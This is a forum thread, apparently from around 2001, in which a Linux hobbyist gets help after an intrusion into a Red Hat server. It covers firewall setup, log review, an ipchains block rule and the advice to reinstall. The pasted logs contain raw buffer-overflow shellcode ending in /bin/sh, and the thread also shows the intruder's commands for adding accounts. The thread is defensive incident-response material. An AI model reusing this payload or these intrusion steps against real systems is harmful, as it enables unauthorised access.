I don't mind helping someone out at all. Helping someone is another form of learning. If you want to set up a firewall, set up a machine with 2 network cards and load Linux up on it. Give me a shell account and I'll work with you on it. If you have multiple IP addresses that you can use, you could hook them up side by side so you server is still functional until the firewall is ready, and then move the server behind the firewall. They say a 486 will work fine as a firewall, but I have had bad luck getting NICs and things to work fine. If you've got it, go ahead and try to set it up. Otherwise, try and get ahold of an old pentium something or other. Email me if need help.

--Mark

BTW, did /etc/redhat-release fix the login screen problem?

Ok, Greate and thanks again,
I will setup the firewall machine this weekend. A pentium 120 with 2 nic card and a 540MB hard drive...Any preferences between Rehat 7.0,6.2 or even SuSE 7.0 for the firewall machine...Tho I must keep redhat 7.0 on the real server. Also I do have a mail server too, I don't know if that would be a problem or not...
BTW: I can setup the firewall on a different IP address until it's done then We can move it to the real server..I have 2 static IP's.
So any particaular way of partioning or any special services needed to be install for now...

I agree with Mark.
And advise you to remove that /etc/redhat-release and /etc/issue stuff from your box. A good hacker will always try first to telnet to your box and see what your server responds!
In your case he will see that you are running RH7. A good starting point for further attempts.

Your box provides a lot of services. To much in my opinion!
Do you really need the finger service on port 79? Or the portmapper (sunrpc) on port 111? What about login(513), netbios(139), shell(514), printer (515), and so on.

Read the ipchains HowTo!!!!

Don't provide your servers IP to all! Makes it a nice target.

Also you should avoid running telnet at ALL costs. SSH is more secure and can do everything telnet can do and much much more.

thanks for the post devnull and I probably don't need all these open ports..But the thing is if you are smart enough to break thru 1 port then you are able to break thru any port right!...And I do probably need to keep my IP address and other hacker usefull information unpublished, but again really that's just making them work a bit harder or even cost them just few steps more to get to the target...Every one one knows that microsoft.com or redhat.com resolve to a certain DNS IP address also knowing what email servers names hotmail runs on is really not hard at all...
What I am getting at is really a solution to stops hackers regardless of all known information that they may need to use when hacking...
Anyway I am looking forward to get this firewall setup and close all these unnessary open ports and some good security policy establised...After all I am in it for the learning experience and not making any money of it at all...

Yea SSH is running too...Hummm..Never used it directly like that before..Cool I will start using it from now on...Thanks..

Mark,
"BTW, did /etc/redhat-release fix the login screen problem?"
Yes it did, and heh..gave me a chance to customize it too...I learnt something new today...
I have another question..Since I have already and quickly deleted all users accounts associated with Hacker and kind of lost all information about his IP address and where he hacked from, not that matters now,..but was wondering if I am still able to find his information now..When I do "last" I still see his user id and part of his domain information...Is there another command that I can run to get the rest of the domain information, although account has been deleted...

Thanks,

I'm not sure what to say about that. The only thing I can recommend is that you check the logs. Check /var/log/secure and check /var/log/messages for anything that looks funny. Also, check /var/log/xfer. Remember, these logs rotate, so if /var/log/secure doesn't have anything that old in it, try /var/log/secure.1, /var/log/secure.2, and so on.

When someone manages to get into a system, I always copy all files put there, modified, and home directory contents of the hacker into a directory so I can go back and check things out closer. It is possible that you could have read the users .bash_history and found out what commands he ran. Finding out from where and how is very important to make sure that it doesn't happen again. If you don't learn how it was done, or at least what was attacked and what it's exploit is, you didn't learn how to prevent it. I also copy all important sections of the log files into a word document. This gives me something to go back and look at later. Like when the same guy tries the same thing and I'm going 'Man, that IP looks familiar. Where did I see that before?'

Ok,
Here is some of /var/log/messages


Feb 5 18:20:09 viper SERVER[12073]: Dispatch_input: bad request line 'BBàóÿ¿áóÿ¿âóÿ¿ãóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000048000 00000134727061security000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000135023880�������������������������������������������������������������������������������������� ���������������������������������������������������������������������������������������������������� ��������������1Û1É1À°FÍ€‰å1Ò²f‰Ð1ɉËC‰]øC‰]ôK‰Mü�MôÍ€1ɉEôCf‰]ìfÇEî^O'‰Mð�Eì‰EøÆEü^P‰Ð�MôÍ€‰ÐCCÍ€‰ÐCÍ€‰Ã1ɲ?‰ÐÍ€‰ÐAÍ€ë^X^‰u^H1ÀˆF^G‰E^L°^K‰ó�M^H�U^LÍ€èãÿÿÿ/bin/sh'
Feb 5 18:20:10 viper SERVER[12074]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000480000000 00000134727061security000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000135023880�������������������������������������������������������������������������������������� ���������������������������������������������������������������������������������������������������� ��������������1Û1É1À°FÍ€‰å1Ò²f‰Ð1ɉËC‰]øC‰]ôK‰Mü�MôÍ€1ɉEôCf‰]ìfÇEî^O'‰Mð�Eì‰EøÆEü^P‰Ð�MôÍ€‰ÐCCÍ€‰ÐCÍ€‰Ã1ɲ?‰ÐÍ€‰ÐAÍ€ë^X^‰u^H1ÀˆF^G‰E^L°^K‰ó�M^H�U^LÍ€èãÿÿÿ/bin/sh'
Feb 5 18:20:10 viper SERVER[12075]: Dispatch_input: bad request line 'BBØóÿ¿Ùóÿ¿Úóÿ¿Ûóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000004800000000000 00000134727061security000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000135023880�������������������������������������������������������������������������������������� ���������������������������������������������������������������������������������������������������� ��������������1Û1É1À°FÍ€‰å1Ò²f‰Ð1ɉËC‰]øC‰]ôK‰Mü�MôÍ€1ɉEôCf‰]ìfÇEî^O'‰Mð�Eì‰EøÆEü^P‰Ð�MôÍ€‰ÐCCÍ€‰ÐCÍ€‰Ã1ɲ?‰ÐÍ€‰ÐAÍ€ë^X^‰u^H1ÀˆF^G‰E^L°^K‰ó�M^H�U^LÍ€èãÿÿÿ/bin/sh'
Feb 5 18:22:08 viper adduser[12092]: new group: name=c4du, gid=1002
Feb 5 18:22:08 viper adduser[12092]: new user: name=c4du, uid=1002, gid=1002, home=/home/c4du, shell=/bin/bash
Feb 5 18:27:19 viper PAM_unix[12096]: (system-auth) session opened for user c4du by (uid=0)
Feb 5 18:27:19 viper -- c4du[12096]: LOGIN ON pts/0 BY c4du FROM dl-max1-C8B0D272.cdi.terra.com.br
Feb 5 18:27:26 viper PAM_unix[12126]: (system-auth) session opened for user toor by c4du(uid=1002)
Feb 5 18:27:46 viper rhnsd[12146]: running program /usr/sbin/rhn_check
Feb 5 18:27:48 viper rhnsd[997]: command returned:
Feb 5 18:29:02 viper sshd[559]: Received SIGHUP; restarting.
Feb 5 18:29:02 viper sshd[559]: RESTART FAILED: av0='sshd', error: Permission denied.
Feb 5 18:30:00 viper CROND[12155]: (root) CMD ( /sbin/rmmod -as)
Feb 5 18:37:57 viper sshd[17313]: log: Server listening on port 22.
Feb 5 18:37:57 viper sshd[17313]: log: Generating 768 bit RSA key.
Feb 5 18:37:57 viper sshd[17313]: log: RSA key generation complete.
Feb 5 18:38:06 viper sshd[17328]: log: Connection from 200.176.210.114 port 2463
Feb 5 18:40:00 viper CROND[17358]: (root) CMD ( /sbin/rmmod -as)
Feb 5 18:40:08 viper PAM_unix[12126]: (system-auth) session closed for user toor
Feb 5 18:40:11 viper PAM_unix[17360]: (system-auth) session opened for user c4du by (uid=0)
Feb 5 18:40:41 viper ftpd[17373]: FTP LOGIN FROM dl-max1-C8B0D272.cdi.terra.com.br [200.176.210.114], c4du
Feb 5 18:41:21 viper ftpd[17373]: FTP session closed
Feb 5 18:43:39 viper PAM_unix[17360]: (system-auth) session closed for user c4du
Feb 5 18:50:00 viper CROND[17883]: (root) CMD ( /sbin/rmmod -as)
Feb 5 18:52:08 viper telnetd[17884]: ttloop: peer died: EOF
Feb 5 18:57:48 viper rhnsd[17885]: running program /usr/sbin/rhn_check
Feb 5 18:57:50 viper rhnsd[997]: command returned:
Feb 5 19:00:00 viper CROND[17887]: (root) CMD ( /sbin/rmmod -as)
Feb 5 19:01:00 viper CROND[17889]: (root) CMD (run-parts /etc/cron.hourly)
Feb 5 19:02:17 viper sshd[17328]: fatal: Read error from remote host: Connection reset by peer
Feb 5 19:10:00 viper CROND[17900]: (root) CMD ( /sbin/rmmod -as)
Feb 5 19:20:00 viper CROND[17903]: (root) CMD ( /sbin/rmmod -as)
Feb 5 19:27:50 viper rhnsd[17904]: running program /usr/sbin/rhn_check
Feb 5 19:27:52 viper rhnsd[997]: command returned:
Feb 5 19:30:00 viper CROND[17906]: (root) CMD ( /sbin/rmmod -as)
Feb 5 19:37:57 viper sshd[17313]: log: Generating new 768 bit RSA key.
Feb 5 19:37:58 viper sshd[17313]: log: RSA key generation complete.
Feb 5 19:40:00 viper CROND[17908]: (root) CMD ( /sbin/rmmod -as)
Feb 5 19:50:00 viper CROND[17917]: (root) CMD ( /sbin/rmmod -as)
Feb 5 19:57:52 viper rhnsd[17924]: running program /usr/sbin/rhn_check
Feb 5 19:57:54 viper rhnsd[997]: command returned:




What do you think...

Also today I noticed that user id c4du is back and \home\c4du exeist again???? empty this time????
He has hacked in again...I did "last" and "finger" and they did not show any trace of user c4du being logged in????

I will post more log files if I see some interesting....

This today:

from /var/log/messages


Feb 8 06:58:31 viper sshd[1124]: log: Connection from 200.176.210.73 port 1143
Feb 8 06:59:42 viper adduser[1153]: new group: name=c4du, gid=1002
Feb 8 06:59:42 viper adduser[1153]: new user: name=c4du, uid=1002, gid=1002, home=/home/c4du, shell=/bin/bash
Feb 8 07:00:00 viper CROND[1156]: (root) CMD ( /sbin/rmmod -as)
Feb 8 07:01:00 viper CROND[1160]: (root) CMD (run-parts /etc/cron.hourly)
Feb 8 07:01:01 viper sshd[555]: log: Generating new 768 bit RSA key.
Feb 8 07:01:01 viper sshd[555]: log: RSA key generation complete.
Feb 8 07:01:17 viper rhnsd[1170]: running program /usr/sbin/rhn_check
Feb 8 07:01:19 viper rhnsd[995]: command returned:
Feb 8 07:02:02 viper PAM_unix[1173]: (system-auth) session opened for user c4du by (uid=0)
Feb 8 07:03:59 viper sshd[1124]: fatal: Read error from remote host: Connection reset by peer
Feb 8 07:03:59 viper PAM_unix[1173]: (system-auth) session closed for user c4du

Well, first off, he set up SSH and is using it to connect to your system. Second, I certainly wouldn't want to trust any of the file system. If it doesn't show him being there, you may have had a rootkit installed in your machine.

If you want to keep it up until the weekend when you have time to reconfigure it, here's what I would do.

Find your ipchains script. Could be /etc/rc.d/rc.firewall Look for a line like:

/sbin/ipchains -F input

If it's not there, add it. Under that line add this:

/sbin/ipchains -A input -i eth0 -s 200.176.210.0/24 -d your.external.ip.here/32 -j REJECT

Put that all in one line and rerun the script.

#/etc/rc.d/rc.firewall (if that's where it is)

This line will block ALL packets coming from the subnet that he is at. This is not a guarantee, as it looks like he is dialing up, or at least picking up a dynamic IP from somewhere. But, chances are, he'll figure you took the box off line when he can't ping it and go on to someone else.

THEN REINSTALL AS SOON AS YOU CAN!!

-Mark

BTW- Did you get the email I sent you?

Ok,
I did it it...
It was under /etc/rc.d/init.d/ipchains

I added the line you specified and reran..Did not get any errors, but don't know if it worked either!

Also I did not any email from you...Maybe becuase I put it a bad email address which I though it was working...I updated my email address with a working one...If you could try again...

BTW:
I plugged in domain http://www.terra.com.br and got a brasilian site which I can't make out anything on it due to language barrier, but I was thinking maybe I could send an email to site administrator there and inform that some one by alias c4du keeps hacking my server...They maybe an ISP or something..He is certainly coming from their site for sure...What do you think!
And send me the email again please...
Thanks...

I sent email. See if you get it...

-Mark

Thanks, I replied to your email...

Also check out what other stuff he is doing:


telnet 209.67.3.166
telnet 209.0.225.243
cat /etc/resolv.conf
nslookup http://www.portalimbui.org
su c4du
nslookup email.portalimbui.org
ftp ftp.portalimbui.org
w
passwd c4du
vi /etc/passwd
/usr/sbin/adduser c4du
cat /etc/passwd
cd /home/c4du

I found this out by going up and down with keyboard curser while logged in as root....

Hey man, if you get this, i locked myself out of you're firewall I sent email and you should be able to get it, but you never know! Find a way to email me!

-Mark